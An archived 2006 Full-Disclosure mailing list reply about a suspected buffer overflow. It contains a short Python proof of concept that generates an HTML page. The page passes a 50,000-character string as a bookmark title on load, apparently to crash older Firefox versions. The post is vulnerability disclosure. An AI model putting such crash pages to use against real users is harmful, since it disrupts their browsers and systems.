lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Mon Jan  2 16:09:59 2006
From: casiamo at gmail.com (casiamo)
Subject: Buffer Overflow vulnerability in Windows Display
	Manager [Suspected]

Hello Sumit,

I saw this for some time ago too and I far as I know the below code would do
the same,
with the versions below 1.0.7. As I remember were all input fields
"vulnerable". I have
choosen the bookmark "name" field, which will popup after loading with a
long buffer.

html = open("firefox.html", "w")
buff = 'A' * 50000
html.write("<html><head>\n"
           "<script type=\"text/javascript\">\n"
           "function bookmarksite(title, url){\n"
           "if (document.all)\n"
           "window.external.AddFavorite(url, title);\n"
           "else if (window.sidebar)\n"
           "window.sidebar.addPanel(title, url, \"\")}\n"
           "</script></head>\n"
           "<body onload=\"javascript:bookmarksite('"+buff+"',
'http://www.mozilla.org')\"
>\n"
           "</body></html>")
html.close()

Regards,

Casiamo
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060102/0e517f6c/attachment.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ